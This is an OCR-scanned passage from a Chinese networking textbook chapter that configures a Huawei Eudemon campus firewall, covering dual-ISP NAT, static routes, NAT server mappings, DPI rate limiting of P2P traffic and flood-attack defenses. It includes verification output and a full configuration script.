Eudemon- interzone - trust - isp2] quit 
Eudemon] firewall interzone dmz ispl 
Eudemon - interzone - dmz - ispl] detect ftp 
[Eudemon - interzone - dmz ~ ispl] quit 
Eudemon] firewall interzone dmz isp2 
[Eudemon - interzone - dmz - isp2] detect ftp 
Eudemon - interzone - dmz - isp2] quit 
Eudemon] firewall interzone trust dmz 


Eudemon - interzone - trust - dmz] detect ftp 





Eudemon - interzone - trust - dmz] quit 
(3) 配置 NAT outbound, 使 内 网 用 户 通过 转换 后 的 公 网 TP 地 址 访问 Internet, 


# 配置 应 用 于 Trust-ISP1 域 间 的 NAT 地 址 池 1. 地 址 池 1 包括 ISP1 提供 的 两 个 IP 地 址 200.1.1.2 和 
200.1.1.3 

Eudemon] nat address- group 1 200.1.1.2 200.1.1.3 

# Bu W: W HJ T Trust-ISP2 域 间 的 NAT 地 址 池 2. 地 址 池 2 包括 ISP2 提供 的 两 个 IP 地 址 202.1.1.2 和 
202.1.1.3 

Eudemon] nat address - group 2 202.1.1.2 202.1.1.3 

# fE Trust-ISP1 域 间 配置 NAT outbound, 将 校内 用 户 的 私 网 IP 地 址 转换 为 ISPl 提供 的 公 网 IP 地 址 
Eudemon] nat - policy interzone trust ispl outbound 

Eudemon - nat - policy - interzone - trust - ispl ~ outbound] policy 1 

Eudemon - nat - policy - interzone - trust - ispl - outbound - 1] policy source 10.1.0.0 0.0. 
255.255 

Eudemon - nat - policy - interzone - trust - ispl- outbound - 1] action source - nat 

Eudemon - nat - policy - interzone - trust ~ ispl ~ outbound - 1] address - group 1 

Eudemon - nat - policy- interzone- trust ~ ispl- outbound - 1] quit 

Eudemon - nat - policy- interzone- trust ~ ispl- outbound] quit 

# fE Trust-ISP2 域 间 配置 NAT outbound, 将 校内 用 户 的 私 网 IP 地 址 转换 为 ISP2 提供 的 公 网 IP 地 址 
Eudemon] nat - policy interzone trust isp2 outbound 

Eudemon - nat - policy - interzone - trust - isp2 - outbound] policy 1 

Eudemon- nat - policy - interzone - trust - isp2 — outbound - 1] policy source 10.1.0.0 0.0. 
255.255 

Eudemon - nat - policy - interzone - trust ~ isp2 ~ outbound - 1] action source- nat 

Eudemon - nat - policy - interzone - trust ~ isp2 - outbound - 1] address - group 2 

Eudemon - nat - policy- interzone- trust ~ isp2 - outbound - 1] quit 





Eudemon - nat - policy- interzone- trust - isp2- outbound] quit 
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(4) 配置 多 条 静态 路 由 和 两 条 默认 路 由 ,实现 网 络 的 双 出 口 特性 和 和 链 路 的 可 靠 性 。 


井 为 特定 目的 IP 地 址 的 报 文 指定 出 接口 ,目的 地 址 为 IPSI 的 指定 出 接口 为 GigabitEthernet 0/0/2、 
目的 地 址 为 ISP2 的 指定 出 接口 为 GigabitEthernet 0/0/4 

[Eudemon] ip route- static 200.1.2.3 24 GigabitEthernet 0/0/2 200.1.1.10 

[Eudemon] ip route- static 200.2.2.1 24 GigabitEthernet 0/0/2 200.1.1.10 

[Eudemon] ip route- static 202.1.2.3 24 GigabitEthernet 0/0/4 202.1.1.10 

[Eudemon] ip route- static 202.2.3.4 24 GigabitEthernet 0/0/4 202.1.1.10 

井 配置 两 条 默认 路 由 , 当 报 文 无 法 匹配 静态 路 由 时 ,通过 默认 路 由 发 送 给 下 一 跳 .为 两 条 默认 路 由 设 
置 不 同 的 优先 级 ,使 不 能 匹配 静态 路 由 的 报 文 优先 通过 GigabitEthernet 0/0/2 接口 转发 到 ISP1 
[Eudemon] ip route- static 0.0.0.0 0.0.0.0 GigabitEthernet 0/0/2 200.1.1.10 

[Eudemon] ip route- static 0.0.0.0 0.0.0.0 GigabitEthernet 0/0/4 202.1.1.10 preference 200 


(5) 配置 NAT Server, 使 校内 和 校外 用 户 能 够 通过 公 网 IP 地 址 访问 图 书馆 的 服务 器 。 


# 配置 基 于 ISP1 区 域 的 NAT Server, [E ISP1 的 用 户 能 够 通过 200.1.1.4 访问 Web 服务 器 ,通过 200. 
1.1.5 访问 FTP 服务 器 

Eudemon] nat server zone ispl protocol tcp global 200.1.1.4 80 inside 192.168.1.5 80 
Eudemon] nat server zone ispl protocol tcp global 200.1.1.4 443 inside 192.168.1.5 443 
Eudemon] nat server zone ispl protocol tcp global 200.1.1.5 21 inside 192.168.1.10 21 

# Ru W 3E ISP2 区 域 的 NAT Server, 使 ISP2 的 用 户 能 够 通过 202. 1.1.4 访问 Web 服务 器 ,通过 202. 
1.1.5 访问 FTP 服务 器 

Eudemon] nat server zone isp2 protocol tcp global 202.1.1.4 80 inside 192.168.1.5 80 
Eudemon] nat server zone isp2 protocol tcp global 202.1.1.4 443 inside 192.168.1.5 443 
Eudemon] nat server zone isp2 protocol tcp global 202.1.1.5 21 inside 192.168.1.10 21 


(6) 配置 DPI 控制 P2P 行为 ,将 网 络 中 P2P 总 流量 限制 在 30Mb/s. 


# Ji H] DPI 功能 ,定义 应 用 协议 集 Network_Control, 并 将 P2P 类 型 协议 加 入 该 应 用 协议 集 
Eudemon] dpi enable 
Eudemon] dpi 





Eudemon- dpi] app - set Network Control 

Eudemon - app - set - Network_Contro1] category p2p 

Eudemon - app - set - Network Control] quit 

Eudemon - dpi] quit 

井 定义 数据 流 分 类 P2P 供 QoS 策略 调用 

Eudemon] traffic classifier P2P 

Eudemon- classifier - P2P] if- match any 

Eudemon - classifier - P2P] quit 

井 定义 流行 为 CAR 供 QoS 策略 调用 ,限定 平均 速率 和 突 发 速率 均 为 30Mb/s, HI P2P 流量 超过 30Mb/s 
后 ,立即 丢弃 超出 部 分 的 报 文 

Eudemon] traffic behavior CRR 

Eudemon- behavior - CAR] car cir 30000000 cbs 30000000 

Eudemon - behavior - CAR] quit 

# BOUE QoS 策略 P2P_CAR, 调 用 配置 好 的 流 分 类 和 流行 为 ,作为 DPI 模块 检测 到 相关 协议 后 的 限 速 
动作 

Eudemon] qos policy P2P CAR 

Eudemon - qospolicy - P2P CAR] classifier P2P behavior CAR 

Eudemon - qospolicy- P2P CAR] quit 

井 定义 DPI 模板 ,对 匹配 应 用 协议 集 的 流量 采用 QoS 策略 控制 
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Eudemon- dpi] template p2p - qos - car 
Eudemon - dpi - template - p2p- qos - car] rule if - match app - set Network Control apply qos 一 
policy P2P CAR 
Eudemon - dpi- template - p2p - qos - car] quit 
Eudemon - dpi] quit 
# 配 置 DPI 策略 ,策略 中 引用 DPI 模板 

Eudemon] dpi 
Eudemon- dpi] policy 1 

Eudemon - dpi- policy - 1] policy template p2p - qos - car 
Eudemon - dpi- policy- 1] quit 








Eudemon - dpi] quit 
(7) 配置 攻击 防范 功能 ,保护 校园 网 络 。 


# Y| 3F SYN Flood, UDP Flood fil ICMP Flood 攻击 防范 功能 ,并 限制 每 条 会 话 允 许 通过 的 ICMP 报 文 最 大 
速率 为 5P/s 

[Eudemon] firewall defend syn- flood enable 

[Eudemon] firewall defend udp- flood enable 

[Eudemon] firewall defend icmp - flood enable 


[Eudemon] firewall defend icmp - flood base - session max - rate 5 


7.4 结果 验证 


(1) 执行 命令 display nat all ,可 以 看 到 配置 的 NAT 地 址 池 和 内 部 服务 器 信 
和 图 7-3 所 示 。 





[Eudemo] display nat all 


NAT address-group information 





number :1 name 

startaddr :200.1.1.2 endaddr :200.1.1.3 
reference :0 vrrp 

vpninstance :public 

number :2 name 1 

startaddr :202.1.1.2 endaddr 1202. 1. 1. 3 
reference il vrrp gu 
vpninstance : public 

Total Zaddress-groups 


Server in private network information: 














id :0 

Zone :ispl 

globaladdr :200.1.1.4 insideaddr :192.168.1.5 
globalport i insideport ps 





图 7-2 display nat all 结果 一 
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id 
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insidevpn 
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insideaddr 
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insidevpn 


vrrp 


:public 


:192. 168. 1. 10 
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:192. 168. 1. 10 
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:192. 168.1.5 


:public 
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:192. 168. 1. 10 
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:192. 168.1. 5 


:public 


:192. 168. 1. 10 
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图 7-3 display nat all 结果 二 
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(2) 通过 在 网 络 中 操作 ,检查 业务 是 否 能 够 正常 实现 。 


井 在 校园 网 内 的 一 台 主 机 上 ,访问 ISP1 所 属 网 段 的 一 台 服 务 器 (JP 地 址 为 200.1.2.3), 通 过 执行 命 
令 display firewall session table, 可 以 看 到 私 网 IP 地 址 转换 成 了 ISPl 的 公 网 IP 地 址 
Ti 

Current Total Sessions : 1 

http VPN: public -> public 10.1.2.2:1674[200.1.1.2:12889] -— » 200.1.2.3:80 


# Æ Internet 的 一 台 主 机 上 (所 属 ISP2 网 段 ) ,访问 学 校 的 FTP Server( 对 外 IP 地 址 为 
200. 1. 1. 5) ,通过 执行 命令 display firewall server-map, 可 以 看 到 服务 器 的 IP 地 址 进行 了 
转换 结果 ,如 图 7-4 所 示 。 
[Eudemon] display firewall server-map 


server-map item(s) 





Nat Server, ANY -> 200.1.1.5[192.168.1.10], Zone: ispl 
Protocol: ANY(Appro: —-), Left-Time: 一 :一 :一 ，Addr-Pool: -一 
VPN: public — public 


Nat Server Reverse, 192.168.1.10[200.1.1 
Protocol: ANY(Appro: —-), Left-Time: 
VPN: public -> public 





ANY, Zone: ispl 
; Addr-Pool: -一 





7-4 display firewall server-map 查询 结果 


(3) 通过 执行 命令 display dpi statistic, 可 以 看 到 P2P 类 型 的 流量 由 于 超过 了 配置 的 限 
定 速率 ,超出 部 分 报 文 被 丢弃 ,如 图 7-5 所 示 。 
[Eudemon] display dpi statistic 


DPI Statistic Information 
Codes: DPI(Deep Protocol Inspection) 


AppName RevPkt DenyPkt QosCarPkt CurConn IPCarConn TotalConn 
http 1001869 0 0 0 0 48 

ftp signal 28 0 0 0 0 5 
bt_data 78234 0 433 0 0 2125 
netbios 1789 0 0 0 0 167 

sab 4035 0 0 0 0 481 

telnet 28829 0 0 0 0 14 


Total Application Number : 6 


7-5 display dpi statistic 查询 结果 


7.5 配置 脚本 


Eudemon 配置 脚本 如 下 : 


# 

nat address — group 1 200.1.1.2 200.1.1.3 

nat address - group 2 202.1.1.2 202.1.1.3 

nat server 0 zone ispl global 200.1.1.4 inside 192.168.1.5 
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nat server 1 zone ispl global 200.1.1.5 inside 192.168.1.10 
nat server 2 zone isp2 global 202.1.1.4 inside 192.168.1.5 
nat server 3 zone isp2 global 202.1.1.5 inside 192.168.1.10 


irewall defend icmp - flood enable 

irewall defend udp - flood enable 

irewall defend syn - flood enable 

irewall defend icmp - flood base - session max - rate 5 


dpi enable 


traffic classifier P2P 


if - match any 








traffic behavior CAR 

car cir 30000000 cbs 30000000 ebs 0 
5 

qos policy P2P CAR 

classifier P2P behavior CAR 

5 

interface GigabitEthernet0/0/3 

ip address 10.1.1.1 255.255.0.0 

# 

interface GigabitEthernet0/0/1 

ip address 192.168.1.1 255.255.255.0 
# 

interface GigabitEthernet0/0/2 

ip address 200.1.1.1 255.255.255.0 
# 

interface GigabitEthernet0/0/4 

ip address 202.1.1.1 255.255.255.0 
# 

firewall zone local 

set priority 100 

# 

firewall zone trust 

set priority 85 

add interface GigabitEthernet0/0/3 
# 

firewall zone untrust 

set priority 5 

# 

firewall zone dmz 

set priority 50 

add interface GigabitEthernet0/0/1 
# 

firewall zone name ispl 

set priority 15 

add interface GigabitEthernet0/0/2 
# 


firewall zone name isp2 
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set priority 20 

add interface GigabitEthernet0/0/4 

# 

firewall interzone trust dmz 

detect ftp 

5 

firewall interzone trust ispl 

detect ftp 

detect qq 

detect msn 

* 

firewall interzone trust isp2 

detect ftp 

detect qq 

detect msn 

5 

firewall interzone dmz ispl 

detect ftp 

5 

firewall interzone dmz isp2 

detect ftp 

# 

ip route - static 0.0.0.0 0.0.0.0 GigabitEthernet0/0/2 200.1.1.10 
ip route - static 0.0.0.0 0.0.0.0 GigabitEthernet0/0/4 202.1.1.10 preference 
200 

ip route - static 200.1.2.0 255.255.255.0 GigabitEthernet0/0/2 200.1.1.10 
ip route - static 200.2.2.1 255.255.255.0 GigabitEthernet0/0/2 200.1.1.10 
ip route - static 202.1.2.0 255.255.255.0 GigabitEthernet0/0/4 
202.1.1.10 

ip route - static 202.2.3.4 255.255.255.0 GigabitEthernet0/0/4 202.1.1.10 
# 

dpi 

# 

app - set Network Control 

category P2P 

# 

template p2p - qos - car 

rule 2000 if - match app - set Network Control apply qos - policy P2P_CAR 
# 

policy 1 

policy template p2p- qos - car 

# 

policy interzone trust dmz outbound 

policy 1 

action permit 

policy source 10.1.0.0 0.0.255.255 

policy destination 192.168.1.5 0 

policy destination 192.168.1.10 0 

# 

policy interzone trust ispl outbound 

policy 1 


第 7 章 网 络 安全 项 目 综合 实践 


301 





action permit 

policy source 10.1.0.0 0.0.255.255 
# 

policy interzone trust isp2 outbound 
policy 1 

action permit 

policy source 10.1.0.0 0.0.255.255 
* 

policy interzone dmz ispl inbound 
policy 1 

action permit 

policy destination 192.168.1.5 0 
policy destination 192.168.1.10 0 
* 

policy interzone dmz isp2 inbound 
policy 1 

action permit 

policy destination 192.168.1.5 0 
policy destination 192.168.1.10 0 
# 

nat - policy interzone trust ispl outbound 
policy 1 

action source - nat 

policy source 10.1.0.0 0.0.255.255 
address - group 1 


# 
nat - policy interzone trust isp2 outbound 
policy 1 


action source - nat 

policy source 10.1.0.0 0.0.255.255 
address - group 2 

# 


return 
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